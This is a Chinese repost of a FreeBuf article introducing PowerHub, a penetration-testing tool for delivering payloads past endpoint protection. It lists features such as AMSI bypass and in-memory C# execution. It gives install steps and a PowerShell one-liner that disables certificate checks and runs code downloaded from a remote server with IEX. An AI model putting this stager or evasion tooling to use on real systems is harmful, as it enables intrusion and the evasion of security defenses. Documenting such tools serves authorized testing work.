关于PowerHub摘要:PowerHub是一款基于Web应用程序的渗透测试数据传输与端点管理工具,该工具可以帮助渗透测试人员传输数据,尤其是那些被端点保护标记的代码。
PowerHub是一款基于Web应用程序的渗透测试数据传输与端点管理工具,该工具可以帮助渗透测试人员传输数据,尤其是那些被端点保护标记的代码。
1、无文件;
2、无状态;
3、证书绑定;
4、通过 RC4 加密对字符串进行“混淆”;
5、支持AMSI旁路;
6、支持用于内存中执行 C# 程序的透明别名;
工具要求PowerShell
Python 3
安装工具由于该工具基于Python 3开发,因此我们首先需要在本地设备上安装并配置好最新版本的Python 3环境。
源码获取
广大研究人员可以直接使用下列命令将该项目源码克隆至本地:
git clone https://github.com/AdrianVollmer/PowerHub.gitPyPI安装(建议)
PowerHub现已托管在了PyPI上,我们可以像安装其他 Python 包一样安装它:
python3 -m pip install powerhub如需构建二进制Payload,则需要 MinGW GCC 和 Mono C# 编译器。在类似 Debian 的系统上,可以使用下列命令安装它们:
apt-get install mono-mcs gcc-mingw-w64-x86-64 gcc-mingw-w64-i686安装后,~/.local/bin中将出现两个新的可执行文件:
powerhubpower-obfuscatepowerhub --auth powerhub:https://:8443工具使用获取有关本地组的信息并将其传回:
PS C:\Users\avollmer> [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$Nxois='bZeVBC4vZfakT5SmCcaFam6IRY6UNLnC';$Plukgmio=New-Object Net.WebClient;IEX $Plukgmio.DownloadString('https://192.168.11.2:8443/') _____ ________ _______ ______|_____] || || ||______ |_____/ |_____|| ||_____] ||_____||__|__| |______| \_ || |_____| |_____]2.0.0 written by Adrian Vollmer, 2018-2024Run 'Help-PowerHub' for helpName : /home/avollmer/.local/share/powerhub/modules/PowerSploit/Recon/PowerView.ps1N : 205工具运行演示本项目的开发与发布遵循MIT开源许可协议。
项目地址PowerHub:
在这里,拓宽网安边界来源:FreeBuf
免责声明:本站系转载,并不代表本网赞同其观点和对其真实性负责。如涉及作品内容、版权和其它问题,请在30日内与本站联系,我们将在第一时间删除内容!
